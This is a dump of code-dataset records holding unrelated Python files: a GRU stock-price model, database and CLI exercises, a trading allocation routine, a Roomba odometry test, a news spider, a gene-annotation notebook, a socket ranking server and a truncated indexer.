scaler.inverse_transform(Y_test.reshape(-1, 1))\n prediction2_inverse = np.array(prediction_inverse[:,0][1:])\n Y_test2_inverse = np.array(Y_test_inverse[:,0])\n\n #calculate RMSE\n RMSE = sqrt(mean_squared_error(Y_test2_inverse, prediction2_inverse))\n return RMSE, prediction2_inverse\n\n\n#%%\ndef workflow(working_data, get_split, train_model, get_rmse,n_train = 250,n_test = 50,look_back = 1):\n X_train, Y_train, X_test, Y_test, scaler, start_point = get_split(working_data, n_train, n_test)\n model = train_model(X_train, Y_train, X_test, Y_test)\n RMSE, predictions = get_rmse(model, X_test, Y_test, scaler, start_point, working_data, n_train)\n return RMSE, predictions\n\n\n#%%\nRMSE, 
predictions = workflow(working_data, get_split, train_model, get_rmse, n_train = 600,n_test = 60)\nprint('Test GRU model RMSE: %.3f' % RMSE)\n\n\n#%%\n# This function is used to repeat the workflow ten times and to calculate average RMSE\ndef cross_validate(working_data,get_split,train_model,get_rmse,workflow,n_train = 250,n_test = 50,look_back = 1):\n rmse_list = []\n for i in range(10):\n print('Iteration:', i+1)\n RMSE, _ = workflow(working_data, get_split, train_model, get_rmse, n_train, n_test, look_back)\n rmse_list.append(RMSE)\n print('Test RMSE: %.3f' % RMSE)\n mean_rmse = np.mean(rmse_list)\n return mean_rmse, rmse_list\n\n\n#%%\nmean_rmse, rmse_list = cross_validate(working_data, get_split, train_model, get_rmse, workflow)\nprint('Average RMSE: ', mean_rmse)\nprint('RMSE list:', rmse_list)\n\n\n#%%\npredictions_new = predictions - mean_rmse\n\nRMSE_new = sqrt(mean_squared_error(Y_test2_inverse, predictions_new))\nprint('Test GRU model RMSE_new: %.3f' % RMSE_new)\n\n\n#%%\ntrace1 = go.Scatter(x=Test_Dates, y=Y_test2_inverse, name= 'Actual Price',\n line = dict(color = ('rgb(66, 244, 155)'),width = 2))\ntrace2 = go.Scatter(x=Test_Dates, y=predictions_new, name= 'Predicted Price',\n line = dict(color = ('rgb(244, 146, 65)'),width = 2))\ndata = [trace1, trace2]\nlayout = dict(title = 'Comparison of true prices (on the test dataset) with prices our model predicted, by dates',\n xaxis = dict(title = 'Date'), yaxis = dict(title = 'Price, USD'))\nfig = dict(data=data, layout=layout)\npy.iplot(fig, filename='results_demonstrating2')\n\n\n#%%\ndef symmetric_mean_absolute_percentage_error(y_true, y_pred, epsilon = 1e-8):\n return np.mean(np.abs(y_pred - y_true) / ((np.abs(y_true) + np.abs(y_pred))/2 + epsilon)) * 100\n\nSMAPE = symmetric_mean_absolute_percentage_error(Y_test2_inverse, predictions_new)\n\nprint('Test SMAPE (percentage): %.3f' % SMAPE)\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":13065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"601992003","text":"import sqlalchemy\nfrom pprint import pprint\n\nengine = sqlalchemy.create_engine(\"mysql+pymysql://root:pwd@localhost/sakila\")\nconnection = engine.connect()\nmetadata = sqlalchemy.MetaData()\n\ncat = sqlalchemy.Table('cat', metadata,\n\t\t\t\tsqlalchemy.Column(\"id\", sqlalchemy.Integer()),\n\t\t\t\tsqlalchemy.Column(\"name\", sqlalchemy.String(20), nullable=False),\n\t\t\t\tsqlalchemy.Column(\"age\", sqlalchemy.Float(), default=3.5),\n\t\t\t\tsqlalchemy.Column(\"alive\", sqlalchemy.Boolean(), default=True))\nmetadata.create_all(engine)\n\n","sub_path":"databases/Exercise_04A.py","file_name":"Exercise_04A.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"131333632","text":"import subprocess as sp\n\nfrom ..core import read, create, delete, update\nfrom ..utils.createCLI import createCLI\n\n\ndef add_menu(connection, cursor):\n createCLI(\"ADD MENU\", {\n 'Actor': create.preAddActor,\n 'Director': create.addDirector,\n 'Brand': create.addBrand,\n 'Channel': create.addChannel,\n 'Show': create.addShow,\n 'Product': create.addProduct,\n 'Ad': create.addProduction,\n 'Guardian': create.addGuardian\n }, connection, cursor, True)\n\n\ndef delete_menu(connection, cursor):\n createCLI(\"DELETE MENU\", {\n 'Actor': delete.deletePerson,\n 'Director': delete.deletePerson,\n 'Brand': delete.deleteBrand,\n 'Channel': delete.deleteChannel,\n 
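The menus.py record that begins above drives every menu through createCLI with a dict from labels to callables. A toy stand-in for that dispatch pattern — create_cli here is a made-up minimal version, not the project's real signature:

def create_cli(title, actions, choice=1):
    # print the menu, then dispatch the chosen label to its callable
    print(title)
    for idx, label in enumerate(actions, start=1):
        print(f"{idx}. {label}")
    label = list(actions)[choice - 1]
    actions[label]()

create_cli("DEMO MENU", {
    "Say hello": lambda: print("hello"),
    "Say bye": lambda: print("bye"),
})  # prints the menu, then "hello"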
'Show': delete.deleteShow,\n 'Product': delete.deleteProduct,\n 'Ad': delete.deleteAd,\n 'Guardian': delete.deleteGuardian\n }, connection, cursor, True)\n\n\ndef read_menu(connection, cursor):\n createCLI(\"READ MENU\", {\n 'Get all Actors': read.readActors,\n 'Get all Directors': read.readDirectors,\n 'Get all Brands': read.readBrands,\n 'Get all Channels': read.readChannels,\n 'Get all Shows': read.readShows,\n 'Get all Products': read.readProducts,\n 'Get all Ads': read.readAds,\n 'Get all Guardians': read.getGuardians,\n 'Get Ad-Show Relations': read.getAdShows,\n \"Get Actor's preferred brands\": read.getActorBrands,\n \"Actors with Physical features\": read.actorsByFeatures,\n 'Average ad production cost': read.avgProduction,\n \"Maximum preferred brands\": read.maxPreferred,\n 'Partial text search for shows': read.searchShow,\n 'Partial text search for actor': read.searchActor,\n 'Get best shows for an ad': read.showsForAd,\n 'Shows with surcharge less than a value': read.surchargeLessThan,\n 'Maximum of sum of the contract money of brand': read.maxProdCost,\n 'Bill for an Ad': read.adBill,\n 'Shows list by amount': read.showList\n }, connection, cursor, True)\n\n\ndef update_menu(connection, cursor):\n createCLI(\"UPDATE MENU\", {\n 'Actor': actor_update_menu,\n 'Director': director_update_menu,\n 'Brand': brand_update_menu,\n 'Product': product_update_menu,\n 'Channel': channel_update_menu,\n 'Show': show_update_menu,\n 'Ad': ad_update_menu\n }, connection, cursor)\n\n\ndef actor_update_menu(connection, cursor):\n createCLI(\"ACTOR UPDATE MENU\", {\n 'AccountNumber': update.updateAccountNumber,\n 'Name': update.updatePersonName,\n 'Height and Weight': update.updateHeightWeight,\n 'Add preferred brand': create.addPrefers,\n 'Remove preferred brand': delete.deletePrefers\n }, connection, cursor, True)\n\n\ndef director_update_menu(connection, cursor):\n createCLI(\"DIRECTOR UPDATE MENU\", {\n 'AccountNumber': update.updateAccountNumber,\n 'Name': update.updatePersonName,\n 'Salary': update.updateSalary,\n 'Supervisor': update.updateSupervisor\n }, connection, cursor, True)\n\n\ndef brand_update_menu(connection, cursor):\n createCLI(\"BRAND UPDATE MENU\", {\n 'POC Email': update.updateBrandEmail,\n 'POC Phone': update.updateBrandPhone\n }, connection, cursor, True)\n\n\ndef product_update_menu(connection, cursor):\n createCLI(\"PRODUCT UPDATE MENU\", {\n 'Price': update.updateProductPrice,\n 'Description': update.updateProductDescription\n }, connection, cursor, True)\n\n\ndef channel_update_menu(connection, cursor):\n createCLI(\"CHANNEL UPDATE MENU\", {\n 'Base Price': update.updateBasePrice\n }, connection, cursor, True)\n\n\ndef show_update_menu(connection, cursor):\n createCLI(\"SHOW UPDATE MENU\", {\n 'Surcharge': update.updateSurcharge,\n 'Air an Ad': create.addAdinShow,\n 'Remove an Ad': delete.deleteDisplayed\n }, connection, cursor, True)\n\n\ndef ad_update_menu(connection, cursor):\n createCLI(\"AD UPDATE MENU\", {\n 'Air in a show': create.addAdinShow,\n 'Remove from a show': delete.deleteDisplayed\n }, connection, cursor, True)\n","sub_path":"app/cli/menus.py","file_name":"menus.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"497277533","text":"import pandas as pd \nimport numpy as np \nfrom common import scalify, lower_bound, select_val_b4_date\nfrom .new_strategy import buy_strategy, sell_strategy, choose_n_stock, new_strategy\nfrom src.read.jq_read_data import 
get_index_stocks, get_latest_price, get_index_stocks_weight, get_price\n\ndef panel_to_df(panel):\n    df_result = None\n    for i in panel.minor_axis:\n        df = panel.minor_xs(i).reset_index()\n        df['stock_id'] = i\n        df_result = pd.concat([df_result, df]) if df_result is not None else df\n    return df_result.reset_index(drop=True)\n\ndef filter_share_dict(shareDict, stock_series):\n    stock_dict = {}\n    for k, v in shareDict.items():\n        if k in stock_series:\n            stock_dict[k] = v\n        else:\n            pass\n    return stock_dict\n\ndef get_init_share(shareDict):\n    min_ = min(list(shareDict.values()))\n    sum_ = sum(list(shareDict.values()))\n    for k, v in shareDict.items():\n        shareDict[k] = int(v * 100 / min_)\n    return shareDict\n\ndef get_init_price(stock_list, b4_date, type_='close'):\n    init_price = {}\n    for stock in stock_list:\n        init_price[stock] = scalify(get_latest_price(stock, type_, b4_date))\n    return init_price\n\ndef measure_asset_val(df4test, initPrice, date, shareDict, cash, type_):\n    '''\n    @df4test: same date\n    '''\n    if type_ != 'open' and type_ != 'close':\n        raise ValueError('open or close?')\n    sum_ = 0\n    for id_, share in shareDict.items():\n        lastPrice = select_val_b4_date(df4test[df4test.stock_id==id_], date, 'date', type_)\n        if lastPrice:\n            sum_ += share * scalify(lastPrice)\n        else:\n            sum_ += share * initPrice[id_]\n    sum_ += cash\n    return sum_\n\ndef allocation(df_test, indicator=None, prob=None, cash=0, type_='open', num_stocks_choose=30):\n    #df_test = panel_to_df(df_test)\n    assetRecord = np.array([])\n    hs300_weight = get_index_stocks_weight()\n    shareDict = filter_share_dict(hs300_weight, df_test.stock_id.unique())\n    shareDict = get_init_share(shareDict)\n    init_price = get_init_price(list(shareDict.keys()), np.min(df_test.date))\n    # df_full is consumed by new_strategy inside the loop, so it must be built here\n    df_full = panel_to_df(get_price(list(df_test.stock_id.unique()), fields=['close']))\n    df_full = df_full.dropna(axis=0)\n    for date, df in df_test.groupby('date'):\n        # measure the asset\n        asset = measure_asset_val(df_test, init_price, date, shareDict, cash, type_)\n        print ('Asset is', asset)\n        assetRecord = np.hstack((assetRecord, asset))\n        # make order\n        stocks2sell = choose_n_stock(df[df.class_==0])\n        invest, shareDict = sell_strategy(stocks2sell, shareDict, asset)\n        cash -= invest\n        stocks2buy = choose_n_stock(df[df.class_==1])\n        invest, shareDict = buy_strategy(stocks2buy, shareDict, cash)\n        invest, shareDict = new_strategy(df_full[df_full.date<=date], shareDict, cash)\n        cash -= invest\n        assert cash >= 0\n        assert (np.array(list(shareDict.values()))>=0).all()\n    return assetRecord","sub_path":"strategy/allocation.py","file_name":"allocation.py","file_ext":"py","file_size_in_byte":3062,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"390528493","text":"from pywinauto.application import Application as WinApp\nfrom fixture.groups import GroupHelper\n\nclass Application:\n\n    def __init__(self,target):\n        self.application = WinApp(backend=\"win32\").start(target)\n        self.main_window = self.application.window(title=\"Free Address Book\")\n        self.main_window.wait(\"visible\")\n        self.group = GroupHelper(self)\n\n    def destroy(self):\n        self.main_window.close()","sub_path":"fixture/aplication.py","file_name":"aplication.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"327177729","text":"# Bhavik Suthar and Ayush Petigara\n# RoombaCI\n\nimport RoombaCI_lib\nimport RPi.GPIO as 
GPIO\nimport sys\nimport serial\nimport time\nimport math\nfrom RoombaCI_lib import DHTurn\n\nGPIO.setmode(GPIO.BCM) # Use BCM pin numbering for GPIO\nRoomba = RoombaCI_lib.Create_2(\"/dev/ttyS0\", 115200)\n\nRoomba.WakeUp(131)\nRoomba.BlinkCleanLight()\n\nif Roomba.Available() > 0:\n\tx = Roomba.DirectRead(Roomba.Available())\n\n# Roomba Constants\nWHEEL_DIAMETER = 72 # millimeters\nWHEEL_SEPARATION = 235 # millimeters\nWHEEL_COUNTS = 508.8 # counts per revolution\nDISTANCE_CONSTANT = (WHEEL_DIAMETER * math.pi)/(WHEEL_COUNTS) # millimeters/count\nTURN_CONSTANT = (WHEEL_DIAMETER * 180)/(WHEEL_COUNTS * WHEEL_SEPARATION) # degrees/count\n\n\nl_counts_list = []\nr_counts_list = []\nangle_list = []\nx_pos_list = []\ny_pos_list = []\ndata_time_list = []\n\nfinal_distance = 0\n#angle = imu.CalculateHeading()\nangle = 0\n# Initial conditions\ndistance = 0.0 # total distance traveled (millimeters)\nx_pos = 0.0 # initial x-direction position (millimeters)\ny_pos = 0.0 # initial y-direction position (millimeters)\nforward_value = 75 # initial forward speed value (mm/s)\nspin_value = 0 # initial spin speed value (mm/s)\nbumper_byte, l_counts_current, r_counts_current, l_speed, r_speed, light_bumper = Roomba.Query(7,43,44,42,41,45) # Read new wheel counts\n\nl_counts_list.append(l_counts_current)\nr_counts_list.append(r_counts_current)\nangle_list.append(angle)\nx_pos_list.append(x_pos)\ny_pos_list.append(y_pos)\ndata_time_list.append(0.0)\n\nRoomba.Move(forward_value, spin_value)\nRoomba.StartQueryStream(7,43,44,42,41,45)\n\n\ninit_time = time.time ()\n\nwhile (time.time() - init_time < 60):\n\t\n\tif Roomba.Available() > 0:\n\t\tbumper_byte, l_counts, r_counts, l_speed, r_speed, light_bumper = Roomba.ReadQueryStream(7,43,44,42,41,45) # Read new wheel counts\n\n\t\t\t# Record the current time since the beginning of loop\n\t\tdata_time = time.time() - init_time\n\t\t\n\t\t# Calculate the count differences and correct for overflow\n\t\tdelta_l_count = (l_counts - l_counts_current)\n\t\tif delta_l_count > pow(2,15): # 2^15 is somewhat arbitrary\n\t\t\tdelta_l_count -= pow(2,16)\n\t\tif delta_l_count < -pow(2,15): # 2^15 is somewhat arbitrary\n\t\t\tdelta_l_count += pow(2,16)\n\t\tdelta_r_count = (r_counts - r_counts_current)\n\t\tif delta_r_count > pow(2,15): # 2^15 is somewhat arbitrary\n\t\t\tdelta_r_count -= pow(2,16)\n\t\tif delta_r_count < -pow(2,15): # 2^15 is somewhat arbitrary\n\t\t\tdelta_r_count += pow(2,16)\n\t\t\n\t\t# Calculate the turn angle change since the last counts\n\t\tangle_change = TURN_CONSTANT * (delta_l_count - delta_r_count) # degrees\n\t\t# Update angle of Roomba and correct for overflow\n\t\tangle += angle_change # degrees\n\t\tif angle >= 360 or angle < 0:\n\t\t\tangle = (angle % 360) # Normalize the angle value from [0,360)\n\t\t\n\t\t# Calculate the distance change since the last counts\n\t\tif delta_l_count == delta_r_count: # or if angle_change == 0\n\t\t\t# Straight Line distance\n\t\t\tdistance_change = 0.5 * DISTANCE_CONSTANT * (delta_l_count + delta_r_count) # millimeters\n\t\t\t# Total distance traveled\n\t\t\tdistance += distance_change # millimeters\n\t\telse: # Circular Arc distance\n\t\t\tdistance_radius = WHEEL_SEPARATION * ((delta_l_count/(delta_l_count - delta_r_count)) - 0.5) # millimeters\n\t\t\tdistance_change = 2 * distance_radius * math.sin(0.5 * math.radians(angle_change)) # millimeters\n\t\t\t# Total distance traveled\n\t\t\tdistance += (distance_radius * math.radians(angle_change)) # millimeters; Slightly larger than distance_change\n\t\t\n\t\t# 
Calculate position data\n\t\tdelta_x_pos = distance_change * math.cos(math.radians(angle - (0.5 * angle_change)))\n\t\tdelta_y_pos = distance_change * math.sin(math.radians(angle - (0.5 * angle_change)))\n\t\tx_pos += delta_x_pos\n\t\ty_pos += delta_y_pos\n\n\t\tfinal_distance = distance\n\n\n\n\t\t#appending to the lists\n\t\tl_counts_list.append(l_counts)\n\t\tr_counts_list.append(r_counts)\n\t\tangle_list.append(angle)\n\t\tx_pos_list.append(x_pos)\n\t\ty_pos_list.append(y_pos)\n\t\tdata_time_list.append(data_time)\n\n\t\tspin_value = DHTurn(angle, 0.0, 0.5) # Determine the spin speed to turn toward the desired heading\n\t\tRoomba.Move(forward_value, spin_value)\n\n\t\tl_counts_current = l_counts\n\t\tr_counts_current = r_counts\n\t#end if roomba.available > 0\n#end while loop\nRoomba.Move(0,0)\ntime.sleep(0.5)\nprint(\"Roomba GOING STRAIGHT TESTING\", file=open(\"outputStraight.txt\",\"a\"))\nprint(\"\\nL Count\", file=open(\"outputStraight.txt\",\"a\"))\nfor i in range(len(l_counts_list)):\n\tprint(\"{:.3f}\".format(l_counts_list[i]), file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\tprint(\", \", file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\nprint(\"\\nR Count\", file=open(\"outputStraight.txt\",\"a\"))\nfor i in range(len(r_counts_list)):\n\tprint(\"{:.3f}\".format(r_counts_list[i]), file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\tprint(\", \", file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\nprint(\"\\nAngle\", file=open(\"outputStraight.txt\",\"a\"))\nfor i in range(len(angle_list)):\n\tprint(\"{:.3f}\".format(angle_list[i]), file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\tprint(\", \", file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\nprint(\"\\nX-Pos\", file=open(\"outputStraight.txt\",\"a\"))\nfor i in range(len(x_pos_list)):\n\tprint(\"{:.3f}\".format(x_pos_list[i]), file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\tprint(\", \", file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\nprint(\"\\nY-Pos\", file=open(\"outputStraight.txt\",\"a\"))\nfor i in range(len(y_pos_list)):\n\tprint(\"{:.3f}\".format(y_pos_list[i]), file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\tprint(\", \", file=open(\"outputStraight.txt\",\"a\"), end=\"\")\t\n\nprint(\"\\nDate Time\", file=open(\"outputStraight.txt\",\"a\"))\nfor i in range(len(data_time_list)):\n\tprint(\"{:.3f}\".format(data_time_list[i]), file=open(\"outputStraight.txt\",\"a\"), end=\"\")\n\tprint(\", \", file=open(\"outputStraight.txt\",\"a\"), end=\"\")\t\n\nprint(\"\\nFinal Distance: \", final_distance, file=open(\"outputStraight.txt\", \"a\"))\t\t\nprint(\"\\nFinal Distance: \", final_distance)\n\nRoomba.ShutDown()\n#GPIO.cleanup()\n","sub_path":"Python_Files/Miscellaneous/test_straight.py","file_name":"test_straight.py","file_ext":"py","file_size_in_byte":5867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"130834199","text":"# -*- coding: utf-8 -*-\nimport scrapy\nfrom datetime import datetime, date\nimport re\nfrom newspaper import Article\n\n\nclass GuardianSpider(scrapy.Spider):\n name = 'guardian'\n allowed_domains = ['www.theguardian.com']\n start_urls = ['https://www.theguardian.com/technology/all', 'https://www.theguardian.com/uk/technology'] #internationala and uk specific site\n\n def parse(self, response):\n if 'uk/technology' in response.request.url:\n for article in response.xpath('//div[@class=\"fc-item__container\"]//a'):\n url = article.xpath('.//@href').get()\n if re.search('technology', url) and ('/video/' not in 
url and '/gallery/' not in url): #remove videos and galleries\n                    yield response.follow(url=url, callback=self.parse_article, meta={ 'url': url })\n        else:\n            articles = response.xpath('//div[@class=\"u-cf index-page\"]')\n            for article in articles.xpath('//h3[@class=\"fc-item__title\"]//a'):\n                url = article.xpath('.//@href').get()\n                yield response.follow(url=url, callback=self.parse_article, meta={ 'url': url })\n\n\n    def parse_article(self,response):\n\n        url = response.request.meta['url']\n        blurp = response.xpath('//div[@class=\"css-zjgnrw\"]//p//text()').get()\n        tags = response.xpath('//li[@class=\"css-184iqxr\"]//a//text()').extract()\n        category = response.xpath('//li[@class=\"css-blajdl\"]//a//text()').get()\n        tags.append(category)\n        def get_key_word(url):\n            article = Article(url)\n            article.download()\n\n            article.html\n            article.parse()\n            article.nlp()\n\n            return article.text, article.publish_date, article.top_image, article.title\n\n        text, article_date, imgurl, title = get_key_word(url)\n\n        #remove reviews and products\n        if re.search('review', title) or re.search('best', title.lower()):\n            pass\n        else:\n            try:\n                article_date = datetime.strftime(article_date, \"%d/%m/%Y\")\n            except (TypeError, ValueError):\n                # strftime raises TypeError when publish_date is None, so fall back to today\n                article_date = date.today().strftime(\"%d/%m/%Y\")\n\n            yield {\n                'title': title,\n                'imgurl': imgurl,\n                'date': article_date,\n                'blurp': blurp,\n                'url': url,\n                'text': text,\n                'category': category,\n                'tags': tags,\n                'source': self.name\n            }","sub_path":"lambdas/src/minearticles/spiders/guardian.py","file_name":"guardian.py","file_ext":"py","file_size_in_byte":2599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"533114372","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Annotate probe IDs with gene symbols \n# \n# In order to identify the genes that compounds with high MAS and low TAS influence\n\n# In[1]:\n\n\nimport pathlib\nimport pandas as pd\nimport numpy as np\n\n\n# In[2]:\n\n\ntop_n_cpds = 6\nbottom_n_cpds = 2 \ngene_cut = 2\n\n\n# In[3]:\n\n\n# Load mapping resource\n# Downloaded from: http://amp.pharm.mssm.edu/public/L1000CDS_download/\nurl = \"http://amp.pharm.mssm.edu/public/L1000CDS_download/apiRowMeta.json\"\nmap_df = pd.read_json(url)\n\n# Setup a dictionary to rename the map\nupdater = dict(zip(map_df.pr_id, map_df.pr_gene_symbol))\n\nprint(map_df.shape)\nmap_df.head()\n\n\n# In[4]:\n\n\n# Load activity scores\nfile = pathlib.Path(\"../6.paper_figures/data/highmas_lowtas_compounds.tsv\")\nactivity_df = pd.read_csv(file, sep=\"\\t\")\n\nprint(activity_df.shape)\nactivity_df.head(3)\n\n\n# In[5]:\n\n\n# What are the top compounds that change lots of MAS but not TAS\ntop_cpds = activity_df.head(top_n_cpds).cpd.tolist()\ntop_cpds\n\n\n# In[6]:\n\n\n# What are the top compounds that change lots of TAS but not MAS\nbottom_cpds = activity_df.sort_values(by=\"mas_tas_dff\").head(bottom_n_cpds).cpd.tolist()\nbottom_cpds\n\n\n# In[7]:\n\n\nfocus_cps = top_cpds + bottom_cpds\n\n\n# In[8]:\n\n\n# Load L1000 data to obtain high differential genes\ndata_dir = pathlib.Path(\"../1.Data-exploration/\")\n\nfile = pathlib.Path(f\"{data_dir}/Consensus/L1000/moa_sizes_consensus_datasets/modz_level5_data.csv\")\ndf = pd.read_csv(file)\n\ndf = df.query(\"pert_iname in @focus_cps\").reset_index(drop=True)\n\nprint(df.pert_iname.value_counts())\nprint(df.shape)\ndf.head(2)\n\n\n# In[9]:\n\n\n# Obtain background gene lists\nbackground_df = pd.DataFrame(\n 
df.columns[df.columns.str.endswith(\"_at\")],\n columns=[\"probe\"]\n)\n\nbackground_df = background_df.assign(gene_symbol=background_df.probe.replace(updater))\n\noutput_file = pathlib.Path(\"results\", \"background_gene_list.tsv\")\nbackground_df.to_csv(output_file, sep=\"\\t\", index=False)\n\nbackground_df.head()\n\n\n# In[10]:\n\n\nexpression_df = (\n df\n .groupby([\"pert_iname\", \"moa\"])\n .median()\n .reset_index()\n .melt(\n id_vars=[\"pert_iname\", \"moa\"],\n value_vars=df.columns[df.columns.str.endswith(\"_at\")],\n value_name=\"L1000_readout\",\n var_name=\"L1000_probe\"\n )\n)\n\nexpression_df = (\n expression_df\n .assign(L1000_abs_readout = expression_df.L1000_readout.abs())\n .query(\"L1000_abs_readout > @gene_cut\")\n .sort_values(by=\"pert_iname\")\n .reset_index(drop=True)\n)\n\nexpression_df = expression_df.assign(gene_symbol=expression_df.L1000_probe.replace(updater))\n\noutput_file = pathlib.Path(\"results\", \"differential_mas_vs_tas_genes.tsv\")\nexpression_df.to_csv(output_file, sep=\"\\t\", index=False)\n\nprint(expression_df.shape)\nexpression_df.head()\n\n\n# In[11]:\n\n\n# Which genes are consistently implicated?\ngene_count_df = (\n expression_df\n .gene_symbol\n .value_counts()\n .reset_index()\n .rename({\"index\": \"gene\", \"gene_symbol\": \"cpd_count\"}, axis=\"columns\")\n)\n\ngene_count_df.head(10)\n\n","sub_path":"5.Gene-analysis/scripts/nbconverted/0.annotate-genes.py","file_name":"0.annotate-genes.py","file_ext":"py","file_size_in_byte":2989,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"637386814","text":"import socket\nimport sys\nimport traceback\nimport json\nimport ast\nfrom collections import OrderedDict\nfrom threading import Thread\n\n\ndef start_server():\n host = \"127.0.0.1\"\n port = 8888 # arbitrary non-privileged port\n\n soc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n soc.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # SO_REUSEADDR flag tells the kernel to reuse a local socket in TIME_WAIT state, without waiting for its natural timeout to expire\n print(\"Socket created\")\n\n try:\n soc.bind((host, port))\n except:\n print(\"Bind failed. 
Error : \" + str(sys.exc_info()))\n sys.exit()\n\n soc.listen(5) # queue up to 5 requests\n print(\"Socket now listening\")\n\n # infinite loop- do not reset for every requests\n while True:\n connection, address = soc.accept()\n ip, port = str(address[0]), str(address[1])\n print(\"Connected with \" + ip + \":\" + port)\n\n try:\n Thread(target=client_thread, args=(connection, ip, port)).start()\n except:\n print(\"Thread did not start.\")\n traceback.print_exc()\n\n soc.close()\ndef client_thread(connection, ip, port, max_buffer_size = 5120):\n is_active = True\n\n while is_active:\n client_input = receive_input(connection, max_buffer_size)\n\n if \"--QUIT--\" in client_input:\n print(\"Client is requesting to quit\")\n connection.close()\n print(\"Connection \" + ip + \":\" + port + \" closed\")\n is_active = False\n else:\n #print(client_input)\n client_input = ast.literal_eval(client_input)\n insertToRankingMemory(client_input)\n connection.sendall(\"-\".encode(\"utf8\"))\ndef receive_input(connection, max_buffer_size):\n client_input = connection.recv(max_buffer_size)\n client_input_size = sys.getsizeof(client_input)\n\n if client_input_size > max_buffer_size:\n print(\"The input size is greater than expected {}\".format(client_input_size))\n\n result = client_input.decode(\"utf8\").rstrip() # decode and strip end of line\n return result\n\n# Rank from ship_from_region for 10 minutes and previous data go to database\n# For tackling streaming data, all the data should be processed on memory\n# MongoDB query runs on memory, but memory architecture is ~~\ndef ranking_sort(updated_order):\n global top_10_region\n global top_10_region_key\n global lowest_rank\n\n new_key, new_value = None, None\n for k,v in updated_order.items():\n new_key, new_value = k, v\n top_10_region[k] = v\n a = sorted(list(top_10_region.items()), key=lambda x: x[1], reverse=True)\n print('d')\n print(a[:10])\n #TODO : IMPORVE SORTING ALGORITHM\n #\n # if len(top_10_region) == 0:\n # top_10_region[new_key] = new_value\n # top_10_region_key.append(new_key)\n # else:\n # if new_key in top_10_region:\n # top_10_region[new_key] = new_value\n # top_10_region_key.append(new_key)\n # else:\n # for key, value in top_10_region.items():\n # if value < new_value:\n\ndef insertToRankingMemory(data):\n global top_10_region\n region = str(data['ship_from_region_x'])+','+str(data['ship_from_region_y'])\n if region in top_10_region:\n order_created[region] += 1\n else:\n order_created[region] = 1\n ranking_sort({region: order_created[region]})\n\n\nclient_socket = None\norder_created = {}\ntop_10_region = OrderedDict()\n\nif __name__ == \"__main__\":\n start_server()\n\n# from flask import Flask, render_template, request\n# import requests\n# from bs4 import BeautifulSoup\n# import random\n# import socket\n# import threading\n#\n# app = Flask(__name__)\n# suggestions_list = []\n# conn = None\n#\n# def server_program():\n# global suggestions_list\n# global conn\n# print('1')\n# # get the hostname\n# host = socket.gethostname()\n# port = 5004 # initiate port no above 1024\n#\n# server_socket = socket.socket() # get instance\n# # look closely. 
The bind() function takes tuple as argument\n# server_socket.bind((host, port)) # bind host address and port together\n#\n# # configure how many client the server can listen simultaneously\n# server_socket.listen(2)\n# conn, address = server_socket.accept() # accept new connection\n# print(\"Connection from: \" + str(address))\n# print(conn)\n# server_program()\n#\n# @app.route('/')\n# def index():\n# return render_template('index.html')\n#\n#\n# @app.route('/suggestions')\n# def suggestions():\n# global suggestions_list\n# global conn\n# data = conn.recv(512).decode()\n# suggestions_list.append(str(data)+'\\n')\n# print(\"from connected user: \" + str(data))\n# return render_template('suggestions.html', suggestions=suggestions_list)\n#\n#\n# if __name__ == '__main__':\n# app.run(debug=True)","sub_path":"PycharmProjects/Delivery_Simulation_AWS_Kinesis-master/Server/Simple_Server.py","file_name":"Simple_Server.py","file_ext":"py","file_size_in_byte":4866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"193196578","text":"#!/usr/bin/python\n# -*- coding: utf8 -*-\nimport sys, os\nfrom services import utils\nsys.path.append(os.getcwd())\n\nimport cPickle as pickle\nimport tokenizer\n\nclass Indexer:\n GLOSSARY = \"glossary.rgi\"\n SUBJECT = \"subject.rgi\"\n FROM = \"from.rgi\"\n BODY = \"body.rgi\"\n SEEN = \"seen.rgi\"\n CACHE = \"cache.rgi\"\n TERMS_VECTORS = \"termvectors.rgi\"\n\n GENCODE = 0\n GENCODELBL = \"\"\n \n def load(self):\n glossshlv = open(self.GLOSSARY)\n subjshlv = open(self.SUBJECT)\n fromshlv = open(self.FROM)\n bodyshlv = open(self.BODY)\n seenshlv = open(self.SEEN)\n cacheshlv = open(self.CACHE)\n vectorshlv = open(self.TERMS_VECTORS)\n \n try:\n self.__glossshlv = pickle.load(glossshlv)\n except EOFError:\n self.__glossshlv = {}\n \n try:\n self.__subjshlv = pickle.load(subjshlv)\n except EOFError:\n self.__subjshlv = {}\n try:\n self.__fromshlv = pickle.load(fromshlv)\n except EOFError:\n self.__fromshlv = {}\n try:\n self.__bodyshlv = pickle.load(bodyshlv)\n except EOFError:\n self.__bodyshlv = {}\n try:\n self.__seenshlv = pickle.load(seenshlv)\n except EOFError:\n self.__seenshlv = []\n try:\n self.__cacheshlv = pickle.load(cacheshlv)\n except EOFError:\n 